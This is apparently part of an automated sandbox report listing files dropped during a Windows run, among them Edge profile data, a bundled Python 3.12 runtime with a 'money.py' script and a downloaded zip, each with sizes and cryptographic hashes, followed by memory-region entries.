                                                        381421ea029f5f48f5c2e59794cf323189f430db3d793fa8189a376baba642b8bbcef1b943b2b253d097fa83c491dd3dbba76b61566142d8ccdccca85b971338

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                        Filesize

                                                        7KB

                                                        MD5

                                                        05c5a8dcc45cd2552f79a3be2567dd5c

                                                        SHA1

                                                        644b9935e3c51e92d0de3c6292d5140720db152e

                                                        SHA256

                                                        ea24a10160b19bcb8d8168f53d2613b0fae665eef7724a909f1a72001d5092e8

                                                        SHA512

                                                        abd3a7b6d029b1326b78ebe5f79c29ed7bc22eea90a1ea65a505860db4f9306ba8fc094e4b3f79b0c499a0eca5f886150ae56d42592b4c2832ea6b50212d6162

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                        Filesize

                                                        6KB

                                                        MD5

                                                        44231fb2a320de633d2d7a6a95b7e084

                                                        SHA1

                                                        58265ae4f27d78abb07c02b966df7c7bc62d6ab0

                                                        SHA256

                                                        beff71b4f90fa5a48a85ff5ef74ad7e249b0cc4750ae32e0d982fd35edf84e66

                                                        SHA512

                                                        ce4f3fedfb9d1bf75a7bafdedf1fb0402102d0c3c75860c1ff2996c2b7ffa1cb6769ac2deac3defd407e2af3569c20c040c8b764719f8e7ec01f2318d7a6545a

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                        Filesize

                                                        16B

                                                        MD5

                                                        6752a1d65b201c13b62ea44016eb221f

                                                        SHA1

                                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                        SHA256

                                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                        SHA512

                                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                        Filesize

                                                        11KB

                                                        MD5

                                                        0e3a1a4e0762b3b3a8f7bdacbf5eaf13

                                                        SHA1

                                                        1c039c1988da745d5e17078823f4a126078ed4b8

                                                        SHA256

                                                        944a129fec745465d44fc1a5b128d5487a0e53c8a48a0634e5a4bca3030d48e5

                                                        SHA512

                                                        d897d6eb950dbf490498b9695f1920201c0b86e67f1a86d60304e7c84551f5445167baf014ba806878d55780fd54e95896dda9a2b917299aaa3774e93655de18

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                        Filesize

                                                        11KB

                                                        MD5

                                                        0d8a0e8c906808642d820439492d6d78

                                                        SHA1

                                                        b83d72ce998c4f37cbcf56a2130640b3b533def2

                                                        SHA256

                                                        5c4f382640023cc8466f2fbd81ed3212cdae1a3c7de1f413e3158013da5ee3f8

                                                        SHA512

                                                        15cfdb8a9589c5b6d7549d7bc3286a602e316cebefd36779d5b3a82dad1154e75014aa49259ef625e02d29955d7c64f53473c5f508c04847f3528d26cd3f4e6f

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        c20ac38ae3022e305b8752804aadf486

                                                        SHA1

                                                        4c144d6cfafb5c37ab4810ff3c1744df81493cdb

                                                        SHA256

                                                        03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

                                                        SHA512

                                                        c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u0u35bz0.kfv.ps1

                                                        Filesize

                                                        60B

                                                        MD5

                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                        SHA1

                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                        SHA256

                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                        SHA512

                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                      • C:\Users\Admin\Downloads\DXJS.zip

                                                        Filesize

                                                        43.8MB

                                                        MD5

                                                        29142a7139a8959272fd2b667d64155a

                                                        SHA1

                                                        a46de2f95db367705bdf214dd0eca4ca6ab8914d

                                                        SHA256

                                                        6c8d2cc0b53be506946fc9ffc150ceea97dc1bdab2023c7e81ceabff55d5e081

                                                        SHA512

                                                        9112110a887fb54c74170c4d312e2ca2d5b3146f7bb80e922140e120485f8a1b011072685ca0d96a5d6cb6948872661d0f79bfca5dec5a95c578eaad437ff911

                                                      • C:\Users\Admin\Downloads\Python\Python312\DLLs\_ctypes.pyd

                                                        Filesize

                                                        122KB

                                                        MD5

                                                        bbd5533fc875a4a075097a7c6aba865e

                                                        SHA1

                                                        ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00

                                                        SHA256

                                                        be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570

                                                        SHA512

                                                        23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

                                                      • C:\Users\Admin\Downloads\Python\Python312\DLLs\libffi-8.dll

                                                        Filesize

                                                        38KB

                                                        MD5

                                                        0f8e4992ca92baaf54cc0b43aaccce21

                                                        SHA1

                                                        c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                                                        SHA256

                                                        eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                                                        SHA512

                                                        6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\base64.cpython-312.pyc

                                                        Filesize

                                                        23KB

                                                        MD5

                                                        6a425637cb61c65ae8cfe0d83e6e3b77

                                                        SHA1

                                                        d7615d5216ab6d69fbff349bf7e12fe5aa45c741

                                                        SHA256

                                                        575e9d22cf5e94a7c15044c45bd8f7c03fce5b8b92336651d57ea5e20da188f4

                                                        SHA512

                                                        84ca7a4f05bc5fbef41fde057dc10a6cc252c4a371b28657085766638a04beacff22c2ac1588d7b077cac6eebe5bfc7c8aadf4ce4f8468282c2a336f7b8d3e27

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\enum.cpython-312.pyc

                                                        Filesize

                                                        78KB

                                                        MD5

                                                        bb08f420f5dfd2344aa42e77cd36669c

                                                        SHA1

                                                        5e6f66233b1a85bfb8fa1812b8f3b1f63e68151c

                                                        SHA256

                                                        23440df45b19d66e0d6177162bb06eb02415cdb8b7ff3acc5bf8b17fd463b1f1

                                                        SHA512

                                                        c2811310838e4ba03211117bb06e8434633365959f9e29888450fcaff1d9de0349b65d91f7e3a6603ce9bcaf79e88f5b48e5c557575fda61e4569c8953c9c34a

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\functools.cpython-312.pyc

                                                        Filesize

                                                        39KB

                                                        MD5

                                                        a8cf4f3f701751740dac394fc396aec7

                                                        SHA1

                                                        73c5cc6c6d08080e788337494b2c39b9703423b6

                                                        SHA256

                                                        3334f1b6609e60a7c5b4d5630654de245ff9a5c8a7072671a850b4a2056319e9

                                                        SHA512

                                                        84e64b35e08e73dffc66d490c52f199fc10f13fab4aab5fd65cb0a1539f555bee6e3524fd353a468a637db165421a6854954e14674dbee12625a6300e092a323

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\operator.cpython-312.pyc

                                                        Filesize

                                                        16KB

                                                        MD5

                                                        9439ffb1d4bbb5cc97e565e7431c4faf

                                                        SHA1

                                                        c929fec735d8281ef0e31961b2aae75a8de84b12

                                                        SHA256

                                                        7b691b1b0892c1ac26351847b8e4740cf395e0ef78900efc6d37290f68811691

                                                        SHA512

                                                        38844f9c8953641d1145d194d4f2700fa74865d6b6a1da5b5174081c610486266cd7cda770d0d366a5fa0186c55bbddb2cab399b9e921196579759a0b58f9ffb

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\struct.cpython-312.pyc

                                                        Filesize

                                                        364B

                                                        MD5

                                                        29ae69bad548bcb4adc79ed4bd7f073d

                                                        SHA1

                                                        4ce183af84f7cb3c428ef87d97c03c871417026d

                                                        SHA256

                                                        038ef897ce5864486e09285946d54c459421b7d10253565c1e2a13857d78b6a9

                                                        SHA512

                                                        fb90f1ddddadd634af51d8af4d0cd0a8b5011c754d068410bc723c3f6a442f8bdf8105d69f4f77539c5ffb8c446ece7dbcd84a2f40483d3b7f54fe4e76fb3e08

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\types.cpython-312.pyc

                                                        Filesize

                                                        14KB

                                                        MD5

                                                        c5d38a269d5b92e2bfde072a30c45e33

                                                        SHA1

                                                        23a0d92d7c87656b952439d7c8bba43049bd535e

                                                        SHA256

                                                        83437236d1d5c63d0e5ab989e104cd3bbce11ea2b3509bded6bac3376a360f5b

                                                        SHA512

                                                        7ff7179e86f9581d1f71459ca1c6959e0e9cfda2840f26df13f84fab36b823ca10fd5c3966209021348e723269f22afcc69cb089230c86ec5d2d6ae5c10cd505

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\base64.py

                                                        Filesize

                                                        20KB

                                                        MD5

                                                        231ae490d92466b1573e541649772154

                                                        SHA1

                                                        4e47769f5a3239f17af2ce1d9a93c411c195a932

                                                        SHA256

                                                        9e685425290c771df1a277b5c7787ad5d4cf0312f2c4b042ce44756df6a3d112

                                                        SHA512

                                                        7084b49f0788bfbe035bc2fe42db7a63b21ebc99f63c03f80dec5569067c1e63312d8c5a754f2d72d7c9bb51fa23ca479fcba78682610eb2b68870cbeae1bea3

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\collections\__init__.py

                                                        Filesize

                                                        52KB

                                                        MD5

                                                        251382c3e093c311a3e83651cbdbcc11

                                                        SHA1

                                                        28a9de0e827b37280c44684f59fd3fcc54e3eabd

                                                        SHA256

                                                        1eb4c4445883fd706016aca377d9e5c378bac0412d7c9b20f71cae695d6bb656

                                                        SHA512

                                                        010b171f3dd0aa676261a3432fe392568f364fe43c6cb4615b641994eb2faf48caabf3080edf3c00a1a65fc43748caaf692a3c7d1311b6c90825ffce185162b0

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\collections\__pycache__\__init__.cpython-312.pyc

                                                        Filesize

                                                        71KB

                                                        MD5

                                                        5ded9aebc5bb1b2b7d27443e6e0a9437

                                                        SHA1

                                                        32c060890716c8aced35c92e2e7ba23199a2fd7a

                                                        SHA256

                                                        8589a1421368d7b06c7ff575007d85b5cade092062f814b7aa4873c2beade5bc

                                                        SHA512

                                                        7509ef1cfc98629fb5916a2913225098d4a84ecd7bb2cac13df80486dc11b478d1e605b1e2bf3b9df89364049de1289269b48b389313937786be985088700af5

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__init__.py

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        d0859d693b9465bd1ff48dfe865833a3

                                                        SHA1

                                                        978c0511ef96d959e0e897d243752bc3a33ba17c

                                                        SHA256

                                                        bb22c1bd20afd47d33fa6958d8d3e55bea7a1034da8ef2d5f5c0bff1225832c0

                                                        SHA512

                                                        093026a7978122808554add8c53a2ead737caf125a102b8f66b36e5fd677e4dc31a93025511fcf9d0533ad2491d2753f792b3517b4db0cfe0206e58a6d0e646c

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__pycache__\__init__.cpython-312.pyc

                                                        Filesize

                                                        22KB

                                                        MD5

                                                        e2b942b6814a6d1cad2e720a7b7c1bc6

                                                        SHA1

                                                        b1af27740ba54ff33ad8a788e0bea405e4053e7b

                                                        SHA256

                                                        2eb5ccbed547f4cb54bd86d1bbdd8a91bdb9f4d7758b09279ba6bca889ef4d5c

                                                        SHA512

                                                        5a0248bf8670f28d5c727d33e7d1857c91413a86e3420676c0e35d342252bd638485d25cc7c9e1f42a0cf18330c842f5a5efeb6bc8f1923620b52a99868215c8

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__pycache__\_endian.cpython-312.pyc

                                                        Filesize

                                                        3KB

                                                        MD5

                                                        0fda9dc9c51560c5455ddc99b95dcfe8

                                                        SHA1

                                                        46794653086d98b8d64eee575e7a04689beea63a

                                                        SHA256

                                                        4bed1c75e896df05229e609fd827d94a5382e92b158595141b487a70600d5c35

                                                        SHA512

                                                        7c110f406deafad91d00468d23c38cc0e76a189ded1e8d9491dc3692fbeb5887cad20ee10a0a97b989fdd67529b2fb8b5ad4e183d535dab1d0f1f254503c83c7

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\_endian.py

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        7daa213263c75057cf125267b7fdfbd3

                                                        SHA1

                                                        efb9403d8e3f09734f6b2ba3889b274997d0a039

                                                        SHA256

                                                        8c5b9ac7306dcf98856c9b815a5fc604ba0f47acab15ac47ad858499c6981579

                                                        SHA512

                                                        1e00f043ab8f3f77a81c8c6ea6760625bcdf2eccbef6432266f75e89f28778b48bd2709dbcf9d70a4a4e1384629aed31c7fdacdf4723fe18f36b6d9366b03921

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__init__.py

                                                        Filesize

                                                        5KB

                                                        MD5

                                                        ea0e0d20c2c06613fd5a23df78109cba

                                                        SHA1

                                                        b0cb1bedacdb494271ac726caf521ad1c3709257

                                                        SHA256

                                                        8b997e9f7beef09de01c34ac34191866d3ab25e17164e08f411940b070bc3e74

                                                        SHA512

                                                        d8824b315aa1eb44337ff8c3da274e07f76b827af2a5ac0e84d108f7a4961d0c5a649f2d7d8725e02cd6a064d6069be84c838fb92e8951784d6e891ef54737a3

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\__init__.cpython-312.pyc

                                                        Filesize

                                                        5KB

                                                        MD5

                                                        5793df77b697f1109fe6473952792aca

                                                        SHA1

                                                        99d036fd2a4e438bfb89c5cf9fab62292d04d924

                                                        SHA256

                                                        6625882aff1d20e1101d79a6624c16d248a9f5bd0c986296061a1177413c36f3

                                                        SHA512

                                                        809eb8fc67657cc7e4635c27921fffa1d028424724542ef8272a2028f17259c11310e6e4ddfe8c4b2c795e536a40300ec6d6b282b126de90698716cde944e5ad

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\aliases.cpython-312.pyc

                                                        Filesize

                                                        12KB

                                                        MD5

                                                        1f1314b9020e3c6fe612e34124f9f2b0

                                                        SHA1

                                                        058c5eb8ff54f49905a5579ccdfccb38de087e97

                                                        SHA256

                                                        9c262190210f884f24e4d227cb6e4e9706b2909ff4ab18917bb9c86da0ddde26

                                                        SHA512

                                                        f1db57c6456def9001201e5db14523ab2cd97c6aba200699aff11a6e8d352009f072281fdec93cd764c4083778efeab2e34e1b0240b0938c4e0b10763b21bf76

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\cp1252.cpython-312.pyc

                                                        Filesize

                                                        3KB

                                                        MD5

                                                        d42473ce94dd1209f1a2b65e7cc79d8f

                                                        SHA1

                                                        56001bd8a180e758e23fa9ff6fe37ec5fc29b6dc

                                                        SHA256

                                                        d7dc1703ebe0364c99ed7c8b02423b80c2ee6f48f31023ca8b7b836e83dc50db

                                                        SHA512

                                                        a523186188060a51849627c3dda24d39b414fa613ae7ab3895ed9b108cc96843019bc2fa475462ef33490bac9ee3e76dd868e699055341f66821557141db478b

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\utf_8.cpython-312.pyc

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        6f9bafab786fdd627c247fbe8e85de01

                                                        SHA1

                                                        ce99d8bfaa08e52be5dece42c851684458116988

                                                        SHA256

                                                        a225709104aa9d764c01de396add10bbcfb96a7ae019af69d8de81a683b1f245

                                                        SHA512

                                                        f53cce6e51e00cb120213810f74016fee82a62be4ed7b5fcdfaefa5f03eaca2e9fc01ad0b7e24860f82d8f2c34fd967e62aeeb04b6a59fe10553c36c96cc79b9

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\aliases.py

                                                        Filesize

                                                        15KB

                                                        MD5

                                                        ff23f6bb45e7b769787b0619b27bc245

                                                        SHA1

                                                        60172e8c464711cf890bc8a4feccff35aa3de17a

                                                        SHA256

                                                        1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8

                                                        SHA512

                                                        ea6b685a859ef2fcd47b8473f43037341049b8ba3eea01d763e2304a2c2adddb01008b58c14b4274d9af8a07f686cd337de25afeb9a252a426d85d3b7d661ef9

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\cp1252.py

                                                        Filesize

                                                        13KB

                                                        MD5

                                                        52084150c6d8fc16c8956388cdbe0868

                                                        SHA1

                                                        368f060285ea704a9dc552f2fc88f7338e8017f2

                                                        SHA256

                                                        7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519

                                                        SHA512

                                                        77e7921f48c9a361a67bae80b9eec4790b8df51e6aff5c13704035a2a7f33316f119478ac526c2fdebb9ef30c0d7898aea878e3dba65f386d6e2c67fe61845b4

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\utf_8.py

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        f932d95afcaea5fdc12e72d25565f948

                                                        SHA1

                                                        2685d94ba1536b7870b7172c06fe72cf749b4d29

                                                        SHA256

                                                        9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e

                                                        SHA512

                                                        a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\enum.py

                                                        Filesize

                                                        81KB

                                                        MD5

                                                        3a87f9629edad420beb85ab0a1c4482a

                                                        SHA1

                                                        30c4c3e70e45128c2c83c290e9e5f63bcfa18961

                                                        SHA256

                                                        9d1b2f7dd26000e03c483bc381c1af20395a3ac25c5fd988fbed742cd5278c9a

                                                        SHA512

                                                        e0aed24d8a0513e8d974a398f3ff692d105a92153c02d4d6b7d3c8435dedbb9482dc093eb9093fb86b021a28859ab541f444e8acc466d8422031d11040cd692a

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\functools.py

                                                        Filesize

                                                        38KB

                                                        MD5

                                                        3638d2608c42e3a3bf3b2b1c51b765f4

                                                        SHA1

                                                        be947a9b8301bbedf2406416ac908963279b46cd

                                                        SHA256

                                                        bd6f192c31c5e266ad9eec9f550b8bc485f90d583764ff81aa3f36d1209f005e

                                                        SHA512

                                                        14b60f0b5119b90fcd4db3b0aeb48ec4ca9775910470178796ba54c0d16f8887b9a3d283f925af779a1cc6bc99d25f016cccbf2bb72d4a9099bb821a54a2b418

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\operator.py

                                                        Filesize

                                                        11KB

                                                        MD5

                                                        dc7484406cad1bf2dc4670f25a22e5b4

                                                        SHA1

                                                        189cd94b6fdca83aa16d24787af1083488f83db2

                                                        SHA256

                                                        c57b6816cfddfa6e4a126583fca0a2563234018daec2cfb9b5142d855546955c

                                                        SHA512

                                                        ac55baced6c9eb24bc5ecbc9eff766688b67550e46645df176f6c8a6f3f319476a59ab6fc8357833863895a4ef7f3f99a8dfe0c928e382580dfff0c28ca0d808

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\re\__init__.py

                                                        Filesize

                                                        16KB

                                                        MD5

                                                        02f3e3eb14f899eb53a5955e370c839f

                                                        SHA1

                                                        e5c3ab0720b80a201f86500ccdc61811ab34c741

                                                        SHA256

                                                        778cdca1fe51cddb7671d7a158c6bdecee1b7967e9f4a0ddf41cfb5320568c42

                                                        SHA512

                                                        839fde2bfd5650009621752ccbceea22de8954bf7327c72941d5224dc2f495da0d1c39ba4920da6314efd1800be2dab94ac4ce29f34dc7d2705fcb6d5ab7b825

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\re\__pycache__\__init__.cpython-312.pyc

                                                        Filesize

                                                        17KB

                                                        MD5

                                                        dd2891a001b7a253aec124836d20a4b5

                                                        SHA1

                                                        91f34a7b0204aae4aacef46bb8ce8add60421d3d

                                                        SHA256

                                                        e71aac7c0a44cf181682c8887ab2139e5d894f94edde24085a26feecbefb77c9

                                                        SHA512

                                                        d88dc7450eec5742b9d21f95062cf04ebbf3712d6e20acd4eabafa3cc176d04980f92574a69f32dccbea0454e509660ac4f90e5e49becb54c4c0cd2ee3da2051

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\struct.py

                                                        Filesize

                                                        272B

                                                        MD5

                                                        5b6fab07ba094054e76c7926315c12db

                                                        SHA1

                                                        74c5b714160559e571a11ea74feb520b38231bc9

                                                        SHA256

                                                        eadbcc540c3b6496e52449e712eca3694e31e1d935af0f1e26cff0e3cc370945

                                                        SHA512

                                                        2846e8c449479b1c64d39117019609e5a6ea8030220cac7b5ec6b4090c9aa7156ed5fcd5e54d7175a461cd0d58ba1655757049b0bce404800ba70a2f1e12f78c

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\test\cjkencodings\shift_jis-utf8.txt

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        cc34bcc252d8014250b2fbc0a7880ead

                                                        SHA1

                                                        89a79425e089c311137adcdcf0a11dfa9d8a4e58

                                                        SHA256

                                                        a6bbfb8ecb911d13581f7713391f8c0ceea1edd41537fdb300bbb4d62dd72e9b

                                                        SHA512

                                                        c6fb4a793870993a9f1310ce59697397e5334dbb92031ab49a3ecc33c55e84737e626e815754c5ddbe7835b15d3817bf07d2b4c80ea5fd956792b4db96c18c2f

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\__init__.py

                                                        Filesize

                                                        147B

                                                        MD5

                                                        c3239b95575b0ad63408b8e633f9334d

                                                        SHA1

                                                        7dbb42dfa3ca934fb86b8e0e2268b6b793cbccdc

                                                        SHA256

                                                        6546a8ef1019da695edeca7c68103a1a8e746d88b89faf7d5297a60753fd1225

                                                        SHA512

                                                        5685131ad55f43ab73afccbef69652d03bb64e6135beb476bc987f316afe0198157507203b9846728bc7ea25bc88f040e7d2cb557c9480bac72f519d6ba90b25

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\builtin\__main__.py

                                                        Filesize

                                                        62B

                                                        MD5

                                                        47878c074f37661118db4f3525b2b6cb

                                                        SHA1

                                                        9671e2ef6e3d9fa96e7450bcee03300f8d395533

                                                        SHA256

                                                        b4dc0b48d375647bcfab52d235abf7968daf57b6bbdf325766f31ce7752d7216

                                                        SHA512

                                                        13c626ada191848c31321c74eb7f0f1fde5445a82d34282d69e2b086ba6b539d8632c82bba61ff52185f75fec2514dad66139309835e53f5b09a3c5a2ebecff5

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\resources\namespacedata01\binary.file

                                                        Filesize

                                                        4B

                                                        MD5

                                                        37b59afd592725f9305e484a5d7f5168

                                                        SHA1

                                                        a02a05b025b928c039cf1ae7e8ee04e7c190c0db

                                                        SHA256

                                                        054edec1d0211f624fed0cbca9d4f9400b0e491c43742af2c5b0abebf0c990d8

                                                        SHA512

                                                        4ec54b09e2b209ddb9a678522bb451740c513f488cb27a0883630718571745141920036aebdb78c0b4cd783a4a6eecc937a40c6104e427512d709a634b412f60

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_pydoc\__init__.py

                                                        Filesize

                                                        138B

                                                        MD5

                                                        4a7dba3770fec2986287b3c790e6ae46

                                                        SHA1

                                                        8c7a8f21c1bcdb542f4ce798ba7e97f61bee0ea0

                                                        SHA256

                                                        88db4157a69ee31f959dccbb6fbad3891ba32ad2467fe24858e36c6daccdba4d

                                                        SHA512

                                                        4596824f4c06b530ef378c88c7b4307b074f922e10e866a1c06d5a86356f88f1dad54c380791d5cfda470918235b6ead9514b49bc99c2371c1b14dc9b6453210

                                                      • C:\Users\Admin\Downloads\Python\Python312\Lib\types.py

                                                        Filesize

                                                        11KB

                                                        MD5

                                                        8303d9715c8089a5633f874f714643a7

                                                        SHA1

                                                        cdb53427ca74d3682a666b83f883b832b2c9c9f4

                                                        SHA256

                                                        d7ce485ecd8d4d1531d8f710e538b4d1a49378afacb6ff9231e48c645a9fa95e

                                                        SHA512

                                                        1a6ca272dde77bc4d133244047fcc821ffcb3adee89d400fe99ece9cf18ab566732d48df2f18f542b228b73b3402a3cace3cd91a9e2b9480b51f7e5e598d3615

                                                      • C:\Users\Admin\Downloads\Python\Python312\Scripts\pip3.12.exe

                                                        Filesize

                                                        105KB

                                                        MD5

                                                        ece8006a0714b569546a3f789638a55a

                                                        SHA1

                                                        520ba56fd30bcf1e08eefb390d392905c3470936

                                                        SHA256

                                                        e9059568c5f1200915f581cf582da6465d68a4b558972c6b5e3501f4aa63de7b

                                                        SHA512

                                                        bb8926c7938da517104afab2f34c8dfc3bfb8c64241770b6e36f1170b87059d32e9b81b9b0451735718e62be123c27f6a053630c85e1b5b21ede6aca7062fe5c

                                                      • C:\Users\Admin\Downloads\Python\Python312\money.py

                                                        Filesize

                                                        452KB

                                                        MD5

                                                        51380fa6ab39c88cae261bc1665c6378

                                                        SHA1

                                                        b3a4578ffdd0c4e7747f406699c61f7a5f11c4e5

                                                        SHA256

                                                        368bf65d3d859596a55e52edd7803c4f96f362f5848a8fb8e6272f97bdbd7936

                                                        SHA512

                                                        8cdf00c96f938131aaf394a40f278edc5247ac06d6183a09c9a927674d7c68044865210f6385d5d57597c8f2c9a29573965774c8246b6b8d5eb0843483d70e70

                                                      • C:\Users\Admin\Downloads\Python\Python312\python.exe

                                                        Filesize

                                                        100KB

                                                        MD5

                                                        3d44212bba2d7a88d6c83ce8523bba88

                                                        SHA1

                                                        62ea5374c17b0f2f88f7d4a6c03b592393dba6f8

                                                        SHA256

                                                        15b41a488c356c0e331facdea6c836a6cec021f12d5fde9844e7ca4a1aa0361a

                                                        SHA512

                                                        89297f1fbe811b23a38fc3dbc22989dfb9faf97960c65f1f0f43be710204b32f41f33ef0bb893815db71c4462d04b52f686b40801f6d4cbd8e529d740618ac67

                                                      • C:\Users\Admin\Downloads\Python\Python312\python3.DLL

                                                        Filesize

                                                        66KB

                                                        MD5

                                                        79b02450d6ca4852165036c8d4eaed1f

                                                        SHA1

                                                        ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4

                                                        SHA256

                                                        d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123

                                                        SHA512

                                                        47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

                                                      • C:\Users\Admin\Downloads\Python\Python312\python312.dll

                                                        Filesize

                                                        6.6MB

                                                        MD5

                                                        3c388ce47c0d9117d2a50b3fa5ac981d

                                                        SHA1

                                                        038484ff7460d03d1d36c23f0de4874cbaea2c48

                                                        SHA256

                                                        c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

                                                        SHA512

                                                        e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

                                                      • C:\Users\Admin\Downloads\Python\Python312\vcruntime140.dll

                                                        Filesize

                                                        116KB

                                                        MD5

                                                        be8dbe2dc77ebe7f88f910c61aec691a

                                                        SHA1

                                                        a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                                                        SHA256

                                                        4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                                                        SHA512

                                                        0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

                                                      • C:\Users\Admin\Downloads\Unconfirmed 174005.crdownload

                                                        Filesize

                                                        25KB

                                                        MD5

                                                        2a6aaf30c4f4fb95035d448aea4b452e

                                                        SHA1

                                                        c4705f2f325c3c0665ce479b79621ba03d9d4382

                                                        SHA256

                                                        0fccf3d1fb38fa337baf707056f97ef011def859901bb922a4d0a1f25745e64f

                                                        SHA512

                                                        22109814422f467121c80c0155615fb72105c369b91e0617e11f011c661c738ce7a59272ae362a3d3c171fb874c53c24094d742feb73ab01b5f5466dd6b8b292

                                                      • memory/464-11505-0x0000029560C10000-0x0000029560C26000-memory.dmp

                                                        Filesize

                                                        88KB

                                                      • memory/464-11503-0x000002955F0D0000-0x000002955F0E6000-memory.dmp

                                                        Filesize

                                                        88KB

                                                      • memory/1224-121-0x000001E6B0370000-0x000001E6B0392000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/1392-11487-0x0000024098A40000-0x0000024098ABA000-memory.dmp

                                                        Filesize

                                                        488KB

                                                      • memory/1392-11488-0x000002409A640000-0x000002409A6BA000-memory.dmp

                                                        Filesize

                                                        488KB

                                                      • memory/1392-11489-0x00000240B30B0000-0x00000240B31CA000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1868-11500-0x000001E6C31D0000-0x000001E6C31F1000-memory.dmp

                                                        Filesize

                                                        132KB

                                                      • memory/3168-11492-0x000001C434080000-0x000001C43408F000-memory.dmp

                                                        Filesize

                                                        60KB

